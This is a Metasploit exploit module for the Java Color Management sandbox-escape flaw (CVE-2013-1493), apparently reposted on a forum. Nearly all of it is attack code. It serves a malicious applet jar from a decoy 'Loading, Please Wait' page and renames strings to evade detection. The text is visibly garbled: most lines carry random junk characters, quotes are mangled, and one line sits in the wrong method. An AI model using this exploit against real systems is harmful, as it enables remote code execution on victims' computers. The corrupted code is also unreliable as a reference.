##
5 U- ~* B& P G4 n3 u) t
% x$ H! v' `4 ]7 D* `& m7 t# This file is part of the Metasploit Framework and may be subject to
7 ]) Z' M" P( ~( B# redistribution and commercial restrictions. Please see the Metasploit- H8 w& X- X2 a A
# web site for more information on licensing and terms of use.
* f1 u- E, s4 ^# http://metasploit.com/) w; \$ |, r0 |' c) t L# U
##" m" C$ o5 _; Y1 X* E
require ‘msf/core’ A8 P. ^8 a" a3 x
require ‘rex’9 L& `3 S) _1 N" ~: j: w
class Metasploit3 < Msf::Exploit::Remote! K _' w7 o$ t0 ?; `# R: {: S
Rank = NormalRanking; G$ O) T* X N2 j
include Msf::Exploit::Remote::HttpServer::HTML
4 ]; y: ^# L3 r+ d9 Y6 oinclude Msf::Exploit::EXE
# Z2 |) b5 j3 }( kinclude Msf::Exploit::Remote::BrowserAutopwn
/ u/ }' z+ C) m8 @1 ~autopwn_info({ :javascript => false })
" X( d9 Z8 U* S2 zdef initialize( info = {} )6 b0 M1 i1 ^- p" j% N" O
super( update_info( info,6 U; m, O. z0 Y
‘Name’ => ‘Java CMM Remote Code Execution’," C, l* w6 u8 e R6 Z# S; o
‘Description’ => %q{
$ v' p( s( ]$ K: Q$ LThis module abuses the Color Management classes from a Java Applet to run6 n! g. Q0 S( R' j7 H) V, G' {
arbitrary Java code outside of the sandbox as exploited in the wild in February
" i; J. j1 V, t7 f u$ f) A4 a4 hand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
# z7 h2 ^% t1 F; _5 M9 ^ }and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1: J5 ^0 [8 G; K, i
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java7 J2 u2 _) P" j: V8 f1 O
warning in order to run the malicious applet.0 a9 j* D. L5 G' K
},
8 L0 L9 x1 Y9 P. G$ K‘License’ => MSF_LICENSE,0 L$ M6 m" I1 c; _3 K1 E! i
‘Author’ =>
( a) y1 P' r" h* X a0 X'Unknown', # Vulnerability discovery and Exploit
. i0 Y: ~$ A5 O* Y1 O'juan vazquez' # Metasploit module (just ported the published exploit)
: J2 k1 g" m3 ?& x0 g1 ?],
7 u0 K+ \/ q. f2 n6 k2 I‘References’ =>4 a4 U# P+ G# d' ^+ w4 K5 X
[3 V% A y/ c" t) E) Z
[ 'CVE', '2013-1493' ],
- C: O' X0 @2 N8 d4 m3 E7 w: c[ 'OSVDB', '90737' ],
: B! m9 |7 ~; b( p9 L& {[ 'BID', '58238' ],
4 N4 ?- _9 o. c4 ^& E8 V8 W[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],! Q% Q# C; {8 |5 @
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ]," l# U. `$ J$ j3 k2 E u, R9 r+ s
[ 'URL', 'http://pastie.org/pastes/6581034' ]
1 T2 @! K: S, }9 n @$ {],
( S3 N @8 d4 z* u9 I3 W‘Platform’ => [ 'win', 'java' ],& a A9 B0 O- Q6 O, C
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
" D9 V2 @0 }* ]$ x9 |2 U. B‘Targets’ =>
$ ^0 }$ g6 c8 A4 J1 D5 Q2 g- @. m[
' o4 Q( B# n+ M$ m Q8 E[ 'Generic (Java Payload)',
1 z, O6 s1 w4 w( B{
+ o, L8 [) [ z: y'Platform' => 'java',4 F8 U9 ?! e1 _" @5 m
'Arch' => ARCH_JAVA
/ Z5 Z5 k& E" v' q9 X}" E! g- [$ X. `9 v
],) V0 O0 K( T3 Z6 R0 B, O7 ^
[ 'Windows x86 (Native Payload)',+ X7 \! v& d# U8 d6 b, {$ ~; B- P
{
7 h! {* O/ ^, O: A2 H" z'Platform' => 'win',
& ^* [6 @. q( ~'Arch' => ARCH_X86
, p' h b/ e3 ]2 p7 @: I}. u+ ^! R' Q2 J3 Z* g
]0 h" e5 l& f) R
],8 W6 X; H+ n/ w& z7 D; X- N
‘‘DisclosureDate’ => ‘Mar 01 2013′* ~4 b* i; Q" o
))0 f) F$ [* v1 H f+ c+ G# b
end) ~9 n) T, ]# Z5 P* m
def setup; d: p* y3 z& C( D5 A1 _! d
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
- U3 M' V- f. O3 [ B+ i1 O@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
( A$ a: ~* m$ ? ?) N% Q4 jpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
/ X- T; H- k3 F8 L) r H' N@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }- I/ ]) _/ k2 L/ f5 H: I
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
O3 \& A9 h# H+ w5 g+ Z1 o; u@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }# A, @# B2 D z, q2 c0 W% U
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
# L' k: j1 c0 @+ @# ]@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }- A$ H3 B8 V C' h. q
@init_class_name = rand_text_alpha(“Init”.length)
8 x1 z& w1 {8 P: \1 o8 P@init_class.gsub!(“Init”, @init_class_name)
, P- @/ ]3 `& f$ j7 a6 Qsuper
8 L. o7 N3 d) Xend3 M) N. I t% _8 ?; N' m' X2 v* w
def on_request_uri(cli, request)
3 w# Z8 E7 d8 ]0 T+ Bprint_status(“handling request for #{request.uri}”)# U! I3 f+ } V1 @ S
case request.uri3 Q/ h2 n2 p& r$ v3 t
when /\.jar$/i j) o: @; o) P) ?4 `5 H- ?
jar = payload.encoded_jar0 U# y8 X( V2 v( M _
jar.add_file(“#{@init_class_name}.class”, @init_class)$ n3 F2 [6 M# g" w3 @9 V
jar.add_file(“Leak.class”, @leak_class)! j$ ?! x) Y, O! y
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
7 _- w8 `8 g$ }0 t: Jjar.add_file(“MyColorSpace.class”, @color_space_class)4 j: T- h% o6 t. b1 q+ p2 h
DefaultTarget’ => 1,
9 X) p* [$ }$ X( Y) T* M# bmetasploit_str = rand_text_alpha(“metasploit”.length)- j) ?8 h* E) ]5 H
payload_str = rand_text_alpha(“payload”.length)* {$ `7 E, Q- p7 G3 v
jar.entries.each { |entry|
: ~9 X; H" z0 L( X. Qentry.name.gsub!(“metasploit”, metasploit_str)6 J0 K0 q) j9 S* c
entry.name.gsub!(“Payload”, payload_str)
( f4 E( h7 r+ h1 O& wentry.data = entry.data.gsub(“metasploit”, metasploit_str)
" B4 I4 R9 m! S! }0 O/ H+ h0 d' ventry.data = entry.data.gsub(“Payload”, payload_str)
" Z6 E, \. e, R}3 \# @' v: C% E
jar.build_manifest, i9 A# Q3 S' a$ E+ Q
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
! S- ^; ]5 Z- V& j1 Y# [! c3 r' @when /\/$/
; M% j0 j/ R3 ^/ q, @: [payload = regenerate_payload(cli)$ O" S! |0 H# ?3 K7 e
if not payload. g3 [! ]2 D8 [7 K" L) I
print_error(“Failed to generate the payload.”)
& \1 h) V4 n4 Jsend_not_found(cli)
* J4 x( w, c) ureturn& p0 G' w" j, M) ?1 M9 y7 `/ q
end+ ~5 Y" w0 H3 C9 d
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
4 q0 j6 P9 U6 _( v4 w2 N/ M- Eelse
; c Q7 p4 `0 r4 z4 D: q4 r; J& J/ Wsend_redirect(cli, get_resource() + ‘/’, ”)' Z+ U. @3 l; ]9 u7 k+ m" b
end
0 y8 p# ~7 k9 r9 Aend
( t1 l4 e8 M+ k L2 @1 S3 T! R! f7 ~def generate_html0 R" c, t" d0 d4 G
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|& E2 `1 A G% c G- t
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
1 ^# X/ } F9 q8 g0 r; t2 Thtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
& q5 U+ S- \3 [/ P9 [. x/ Phtml += %Q|</applet></body></html>|* U0 q1 J" K- X6 a
return html
3 r8 ~) Y i: r# Pend
% W: l" `& R9 U# F3 C& l8 B3 D; h0 ]end# i7 S& _6 M7 Q3 O
end
! ^: i. i2 k- Q" [3 D# A* ^ |
发表于 2013-4-4 17:31:17
收藏
支持
反对